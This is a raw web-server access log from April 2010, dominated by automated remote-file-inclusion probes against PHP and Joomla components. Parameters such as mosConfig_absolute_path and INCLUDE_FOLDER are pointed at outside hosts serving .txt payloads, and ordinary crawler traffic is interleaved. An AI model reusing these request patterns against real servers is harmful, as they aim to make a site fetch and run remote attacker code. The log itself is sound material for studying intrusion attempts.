89.149.241.209 - - [07/Apr/2010:07:03:35 -0400] "GET //[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:03:35 -0400] "GET /logs//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:03:35 -0400] "GET /logs/access_log.Q109092200//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:07:03:36 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:07:03:36 -0400] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.62.35.55 - - [07/Apr/2010:07:03:36 -0400] "GET /logs/access_log.Q109111500//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:03:37 -0400] "GET /logs/error_log.Q109062900%20%20//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:03:39 -0400] "GET /logs/access_log.Q110031200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:03:43 -0400] "GET /?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:03:43 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 45236 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:03:44 -0400] "GET /logs/access_log.Q109060600%20%20/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:03:49 -0400] "GET /logs/access_log.Q110031200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:03:50 -0400] "GET /logs/access_log.Q109060600%20%20/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:03:53 -0400] "GET /logs/access_log.Q110031200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:03:59 -0400] "GET /logs/access_log.Q110031500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:04:02 -0400] "GET /logs/access_log.Q110031200%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:04:09 -0400] "GET /images/_notes/nav04_home_off.jpg.mno HTTP/1.1" 200 257 "-" "Yandex/1.01.001 (compatible; Win16; I)"
58.230.162.220 - - [07/Apr/2010:07:04:22 -0400] "GET /logs/access_log.Q110031500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:47 -0400] "GET //[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:47 -0400] "GET /logs/access_log.Q109102900//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:47 -0400] "GET /logs/access_log.Q109092200//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:47 -0400] "GET /logs/access_log.Q109062900//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:47 -0400] "GET /logs//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:47 -0400] "GET /logs//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:04:50 -0400] "GET /logs/access_log.Q110031500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:50 -0400] "GET //[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:04:57 -0400] "GET /logs/error_log.Q109062900//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:15 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:15 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:15 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:15 -0400] "GET /logs/access_log.Q109060700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:18 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:18 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:18 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:18 -0400] "GET /logs/access_log.Q109060700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:39 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:39 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:39 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:39 -0400] "GET /logs/access_log.Q109060700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:43 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:43 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:43 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.162.220 - - [07/Apr/2010:07:06:43 -0400] "GET /logs/access_log.Q109060700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.howtolisten.kr/sarangbi_bgm/respon1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
96.244.130.147 - - [07/Apr/2010:07:06:45 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LH218C75B20A96800F756059+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
96.244.130.147 - - [07/Apr/2010:07:06:46 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LH218C75B20A96800F756059+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322)"
209.59.12.99 - - [07/Apr/2010:07:07:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.241.209 - - [07/Apr/2010:07:07:09 -0400] "GET /logs/access_log.Q109062900//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:07:09 -0400] "GET /logs//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:07:09 -0400] "GET //[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:07:07:31 -0400] "GET /logs/access_log.Q110032500//[PATH]/_conf/php-core/common-tpl-vars.php?conf[lang]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:08:10 -0400] "GET /logs/access_log.Q108081600 HTTP/1.1" 404 224 "-" "Yandex/1.01.001 (compatible; Win16; I)"
125.160.17.201 - - [07/Apr/2010:07:08:29 -0400] "GET ///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:08:29 -0400] "GET /logs///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:08:29 -0400] "GET /logs/access_log.Q110030500%20%20///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:08:45 -0400] "GET ///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:08:45 -0400] "GET /logs///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:08:45 -0400] "GET /logs/access_log.Q110020700///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:09:06 -0400] "GET /logs/access_log.Q110020700%20%20///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.65.182 - - [07/Apr/2010:07:09:25 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.182 - - [07/Apr/2010:07:09:25 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F82C40006BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.225.106.11 - - [07/Apr/2010:07:10:00 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:00 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:01 -0400] "GET /logs/access_log.Q109062800%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:05 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:05 -0400] "GET /logs/access_log.Q109062800%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:05 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:07:10:17 -0400] "GET /images/over-store_burs_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
188.165.195.229 - - [07/Apr/2010:07:10:19 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:19 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:22 -0400] "GET /logs/access_log.Q109052900%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.160.17.201 - - [07/Apr/2010:07:10:23 -0400] "GET /logs/access_log.Q110022700%20%20///components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://kliklan.com/images/nongkrong/scan/ID1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:25 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:28 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:43 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:43 -0400] "GET /logs/access_log.Q109070600//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:10:43 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:45 -0400] "GET /logs/access_log.Q109070600//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:45 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:10:45 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:11:01 -0400] "GET /logs/access_log.Q109070600//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:11:29 -0400] "GET /?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:11:29 -0400] "GET /logs/access_log.Q109103100/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:11:29 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 45236 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:07:12:12 -0400] "GET /images/_notes/nav_store_history_over_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.239.124.204 - - [07/Apr/2010:07:12:13 -0400] "GET /?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:12:13 -0400] "GET /logs/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 45236 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:07:12:13 -0400] "GET /logs/access_log.Q109103100/?INCLUDE_FOLDER=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:03 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:03 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:03 -0400] "GET /logs/access_log.Q109091600/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:04 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:07:13:09 -0400] "GET /logs/access_log.Q109070600//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:15 -0400] "GET /logs/access_log.Q109091600/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:15 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:20 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:20 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:20 -0400] "GET /logs/access_log.Q109091600%20%20/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:27 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:27 -0400] "GET /logs/access_log.Q109091600%20%20/akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:13:27 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:35 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:35 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:35 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:36 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:36 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:36 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:38 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:38 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:38 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:39 -0400] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:40 -0400] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:07:13:41 -0400] "GET /logs/error_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:14:15 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:14:15 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:14:18 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:14:19 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:07:14:19 -0400] "GET /logs/access_log.Q110011800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.114.252 - - [07/Apr/2010:07:14:19 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.0" 200 56337 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.70.32.2 - - [07/Apr/2010:07:14:24 -0400] "GET /logs/access_log.Q110010100%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.225.106.11 - - [07/Apr/2010:07:14:25 -0400] "GET /logs/access_log.Q109071800//content/multithumb/multithumb?mosConfig_absolute_path=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.216.43.133 - - [07/Apr/2010:07:14:38 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.sarkoidose-foreningen.dk///files/thumbs/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
